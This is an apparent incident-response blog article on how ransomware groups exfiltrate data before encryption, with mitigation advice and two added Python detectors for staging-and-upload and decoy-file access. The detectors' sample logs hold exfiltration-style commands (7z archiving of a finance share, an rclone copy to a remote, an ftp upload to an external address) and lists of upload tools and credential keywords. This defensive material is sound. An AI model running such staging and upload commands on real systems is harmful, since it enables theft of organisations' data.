We’ve got your data: threat actor tactics for a successful data heist

Tom Priest
June 2021
A closer look at data theft by ransomware groups

In this article we look into the well-established tactic of double extortion, some of the methods used by threat actors, and how to prevent it.

This article was originally published as a guest article for DAC Beachcroft's Data And Cyber Bulletin May 2021.

The strategies and tools used by cyber threat actors have grown increasingly sophisticated, with one of the most significant recent developments being the theft of data from organisations. Over the past year, ransomware threat groups have widely adopted the tactic of exfiltrating data prior to encrypting files, intensifying the pressure on victims to pay a ransom.

The consequences of data breaches can be devastating to organisations. On top of the underlying cost of dealing with a ransomware attack (business interruption, system restoration, incident response and legal advice), organisations may also have to meet data-breach-related costs such as fines, class action costs and notification costs. The reputational damage of a data breach can be long-lasting, affecting potential future investment opportunities, share price and, most damaging of all, customer trust.

In this article, we explore the diverse arsenal of tools and techniques that ransomware groups use to steal data, making it one of the most damaging risks facing businesses worldwide. To mitigate this increasing threat, organisations need to ensure that a range of controls are in place, from a robust data loss prevention strategy to user awareness training.

A shift in behaviour

As many organisations have established more effective data backup and recovery strategies, it is becoming more common to restore systems from backups rather than pay exorbitant ransoms for decryption keys. As a result, many ransomware threat groups now exfiltrate data before encrypting files. They then threaten to publish the data publicly, which increases pressure on the victim organisation to pay the ransom and recover their files. Threat groups such as DoppelPaymer and Sodinokibi host dedicated data leak sites on the dark web where sample files are published as proof of compromise. DarkSide, the ransomware group believed to be responsible for the recent Colonial Pipeline cyberattack in the US, hosted more than 2 terabytes of stolen data on its leak site, DarkSide Leaks, before it was taken offline on 13 May. By the end of 2020, data exfiltration occurred in more than 70% of all ransomware attacks, according to analysis by Coveware.

From compromise to data breach: how data is exfiltrated

Once threat actors gain access to a network, they will often search for specific document types such as Word documents, PDFs and Excel spreadsheets with filenames that contain terms such as ‘password’, ‘credentials’ and ‘financial’. These files can provide the information that threat actors need to elevate privileges and gain wider access to the network, and also provide high-value targets for data exfiltration. When critical systems, such as file servers, have been identified, threat actors often operate a ‘low and slow’ approach to harvest as much sensitive data as possible whilst avoiding detection by endpoint and perimeter security measures.

In attempts to remain undetected, threat actors will utilise tools or features that already exist on the victim’s systems, a practice referred to as ‘living off the land’. Commonly used software tools such as WinRAR and 7-Zip allow threat actors to compress large volumes of data prior to exfiltration. File-sharing protocols used in most organisations for the legitimate transfer of files, including SMB and FTP, can then be exploited to move the data out of victim networks.

As the security landscape has shifted and new ransomware threat groups have established themselves, novel methods of exfiltrating data have been introduced. The rapid adoption of cloud applications and remote access software during the COVID-19 pandemic left gaps in the security posture of many businesses, as speed of deployment was prioritised over security. Ransomware groups such as Conti have exploited the lack of security monitoring of cloud storage applications through the use of tools such as the command-line program Rclone. This tool can transfer files to more than fifty cloud storage providers, including Google Drive, Amazon S3 and Microsoft OneDrive, allowing threat actors to steal data whilst evading detection.
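The two preceding paragraphs describe the pattern a defender can look for: a built-in or dual-use archiver is run against a share, and shortly afterwards a transfer tool (Rclone, FTP) moves the archive off the host. The following is an added example, not code from the article or from Asceris, showing how that staging-then-upload sequence can be correlated in process-creation telemetry. The log lines, host names, account names, tool list and the internal address ranges are all constructed or assumed for illustration; the field layout is a simplified pipe-delimited form rather than any product's real log format.

```python
"""Added example (not from the original article): flag 'living off the land'
data staging and upload in process-creation logs. All sample events are
constructed for illustration."""
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed sample telemetry: timestamp|host|user|image path|command line
SAMPLE_EVENTS = """\
2021-05-10T01:12:04|FS01|svc_backup|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a -p -mhe=on C:\\Users\\Public\\fin.7z D:\\Shares\\Finance\\
2021-05-10T01:31:40|FS01|svc_backup|C:\\Users\\Public\\rclone.exe|rclone.exe copy C:\\Users\\Public\\fin.7z remote:backup --transfers 8
2021-05-10T09:05:11|WS22|alice|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a C:\\Users\\alice\\photos.zip C:\\Users\\alice\\Pictures\\
2021-05-10T10:20:00|WS07|bob|C:\\Windows\\System32\\ftp.exe|ftp.exe -s:C:\\Temp\\up.txt 203.0.113.50
"""

# Archivers and transfer tools the (hypothetical) organisation treats as dual-use.
ARCHIVERS = {"7z.exe", "7za.exe", "winrar.exe", "rar.exe"}
UPLOADERS = {"rclone.exe", "ftp.exe", "curl.exe"}
# Address ranges assumed to be internal; anything else counts as an external destination.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# An rclone remote is written "name:path"; the lookahead keeps "C:\..." drive letters out.
RCLONE_REMOTE = re.compile(r"\s([A-Za-z0-9_-]+):(?![\\/])")


def parse_events(text):
    """Turn the pipe-delimited sample into dicts with a datetime and a lower-cased image name."""
    events = []
    for line in text.splitlines():
        ts, host, user, image, cmd = line.split("|", 4)
        events.append({
            "ts": datetime.fromisoformat(ts),
            "host": host,
            "user": user,
            "image": image.rsplit("\\", 1)[-1].lower(),
            "cmd": cmd,
        })
    return events


def is_external(ip_text):
    """True when the address is outside every configured internal range."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def classify(event):
    """Return ('archive' | 'upload', detail) for an interesting event, else (None, None)."""
    image, cmd = event["image"], event["cmd"]
    if image in ARCHIVERS and re.search(r"\s[aA]\s", cmd):  # 'a' = add files to an archive
        protected = bool(re.search(r"\s-p", cmd))           # password-protected staging archive
        return "archive", "password-protected archive" if protected else "archive"
    if image == "rclone.exe":
        m = RCLONE_REMOTE.search(cmd)
        return "upload", f"rclone remote '{m.group(1)}'" if m else "rclone (no remote parsed)"
    if image in UPLOADERS:
        for ip in IPV4.findall(cmd):
            if is_external(ip):
                return "upload", f"{image} to external host {ip}"
        return "upload", f"{image} (internal or unknown destination)"
    return None, None


def detect_exfiltration(text, window=timedelta(minutes=60)):
    """Correlate per host: an upload within `window` of an archive is 'high'; an upload alone is 'medium'."""
    last_archive = {}  # host -> (timestamp, detail) of the most recent archiving
    alerts = []
    for ev in sorted(parse_events(text), key=lambda e: e["ts"]):
        kind, detail = classify(ev)
        if kind == "archive":
            last_archive[ev["host"]] = (ev["ts"], detail)
        elif kind == "upload":
            staged = last_archive.get(ev["host"])
            if staged and ev["ts"] - staged[0] <= window:
                severity = "high"
                detail = f"{staged[1]} at {staged[0].isoformat()} then {detail}"
            else:
                severity = "medium"
            alerts.append({"host": ev["host"], "user": ev["user"], "severity": severity,
                           "ts": ev["ts"].isoformat(), "detail": detail})
    return alerts


if __name__ == "__main__":
    for alert in detect_exfiltration(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed events, the file server FS01 produces a single high-severity alert (a password-protected archive followed nineteen minutes later by an Rclone copy to a cloud remote), WS07 produces a medium-severity alert for an FTP session to an external address, and the workstation that merely zipped a photo folder produces nothing. Archiving on its own is too common to alert on; it is the combination with an outbound transfer on the same host that carries the signal.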

In organisations where perimeter and cloud security is closely monitored, exfiltrating data via a remote attack may be impractical, and physical access to the network is required. Threat actors and malicious insiders can use USB drives and removable media such as external hard drives and mobile phones to facilitate data exfiltration. In March 2021, a Russian man pleaded guilty to attempting to bribe a Tesla employee with $1 million. According to court documents filed with the U.S. Department of Justice, the man conspired to “transmit malware provided by the co-conspirators into the company’s computer system, exfiltrate data from the company’s network, and threaten to disclose the data online unless the company paid the co-conspirators’ ransom demand”.

Reducing the risk of data exfiltration

Although software vulnerabilities and weak perimeter security controls are frequent infection vectors, phishing emails are the most common method of compromise used by ransomware groups to gain entry into victim networks. Sophisticated social engineering techniques trick users into giving away credentials or clicking malicious links within emails. Controls that reduce the risk of phishing and social engineering are therefore an effective way to address data exfiltration risk. Organisations can also mitigate the threat of data exfiltration by implementing regular email security awareness training to thwart attacks before they begin.

An effective data loss prevention (DLP) strategy, together with endpoint DLP agents, can help companies to monitor sensitive data by generating alerts when signs of exfiltration are observed. Organisations should consider blocking or actively managing access to cloud storage solutions that are not approved for use. Security monitoring and logging tools should be utilised to flag unusual behaviour within the network perimeter, including endpoint detection and response (EDR) platforms to continuously monitor for suspicious activity.

Implementing a zero-trust architecture allows organisations to minimise the attack surface of the network whilst limiting opportunities for lateral movement. Proactive security measures that set traps for cyber threat actors can be used to alert organisations to a potential breach, using tools such as Canarytokens. Where appropriate, administrative tools such as RDP and WinRM and vulnerable versions of file-sharing protocols such as SMBv1 should be disabled to reduce the risk of compromise. Finally, good practice such as vulnerability patching, antivirus software and multi-factor authentication should be employed to provide a more robust defence against intrusion and the subsequent threat of data exfiltration.
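The article notes earlier that intruders search shares for filenames containing terms such as ‘password’, ‘credentials’ and ‘financial’, and here recommends trap-based detection in the spirit of Canarytokens. The following added example (not code from the article, from Asceris or from the Canarytokens project) puts the two together on the defender's side: decoy documents planted under exactly those names should never be opened by anyone but the backup agent, and a single account opening several keyword-named files within a few minutes is a sweep worth alerting on. The audit records are constructed and simplified from the field shape of Windows Security Event ID 4663 (object access); the decoy paths, account names and the allowlisted backup process are assumptions.

```python
"""Added example (not from the original article): alert on access to decoy
'honeyfiles' and on an account sweeping a file share for documents whose
names match the terms attackers search for. Audit records are constructed
and simplified from the shape of Windows Security Event ID 4663."""
import re
from datetime import datetime, timedelta

# Constructed, simplified object-access audit records (account, process, object path).
SAMPLE_4663 = [
    {"ts": "2021-05-10T01:02:10", "account": "svc_bkp", "process": r"C:\Program Files\BackupAgent\agent.exe",
     "object": r"D:\Shares\IT\credentials.docx"},
    {"ts": "2021-05-10T01:05:33", "account": "jsmith", "process": r"C:\Windows\explorer.exe",
     "object": r"D:\Shares\HR\holiday_rota.xlsx"},
    {"ts": "2021-05-10T01:06:01", "account": "jsmith", "process": r"C:\Windows\System32\cmd.exe",
     "object": r"D:\Shares\IT\credentials.docx"},
    {"ts": "2021-05-10T01:06:04", "account": "jsmith", "process": r"C:\Windows\System32\cmd.exe",
     "object": r"D:\Shares\Finance\financial_summary.pdf"},
    {"ts": "2021-05-10T01:06:07", "account": "jsmith", "process": r"C:\Windows\System32\cmd.exe",
     "object": r"D:\Shares\Finance\passwords_old.txt"},
    {"ts": "2021-05-10T01:06:09", "account": "jsmith", "process": r"C:\Windows\System32\cmd.exe",
     "object": r"D:\Shares\Sales\password_policy.docx"},
]

# Decoy documents planted on the share (hypothetical paths); no legitimate user opens them.
HONEYFILES = {r"d:\shares\it\credentials.docx", r"d:\shares\finance\passwords_old.txt"}
# Hypothetical backup agent that is allowed to read everything, decoys included.
ALLOWED_PROCESSES = {"agent.exe"}
# The search terms the article lists as typical of attackers hunting for high-value files.
KEYWORDS = re.compile(r"password|credential|financ", re.IGNORECASE)


def basename(path):
    """Last component of a Windows path."""
    return path.rsplit("\\", 1)[-1]


def honeyfile_alerts(records):
    """Critical alert for every decoy read by a process that is not the allowlisted backup agent."""
    alerts = []
    for r in records:
        if r["object"].lower() in HONEYFILES and basename(r["process"]).lower() not in ALLOWED_PROCESSES:
            alerts.append({"type": "honeyfile_access", "severity": "critical", "account": r["account"],
                           "process": basename(r["process"]), "object": r["object"], "ts": r["ts"]})
    return alerts


def keyword_sweep_alerts(records, window=timedelta(minutes=5), threshold=3):
    """One high alert per account that opens >= threshold distinct keyword-named files inside `window`."""
    per_account = {}
    for r in records:
        if KEYWORDS.search(basename(r["object"])):
            per_account.setdefault(r["account"], []).append(
                (datetime.fromisoformat(r["ts"]), r["object"].lower()))
    alerts = []
    for account, hits in per_account.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):  # slide a window starting at each hit
            seen = {obj for ts, obj in hits[i:] if ts - start <= window}
            if len(seen) >= threshold:
                alerts.append({"type": "keyword_sweep", "severity": "high", "account": account,
                               "matches": len(seen), "window_start": start.isoformat()})
                break
    return alerts


def analyse(records):
    """Run both heuristics over a batch of audit records."""
    return honeyfile_alerts(records) + keyword_sweep_alerts(records)


if __name__ == "__main__":
    for alert in analyse(SAMPLE_4663):
        print(alert)
```

On the constructed records the backup agent's read of a decoy is ignored, while the interactive account that opened two decoys from a command shell raises two critical honeyfile alerts and one high-severity sweep alert for four keyword-named files within eight seconds. Decoys only work if their names are exactly the kind an intruder greps for, if file-access auditing is actually enabled on the share, and if the allowlist is kept small; a decoy that legitimate staff keep opening is noise rather than a tripwire.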

Tom Priest
Tom is a cyber security analyst at Asceris specialising in incident response, network forensics, business email compromise investigations and ransomware investigations.

About Asceris

Our mission at Asceris is to reduce the financial and business impact of cyber incidents and other adverse events. By understanding the cost drivers of claims and addressing these proactively through automation and continuous process refinement, we are able to deliver high quality incident response services in close collaboration with our industry partners.
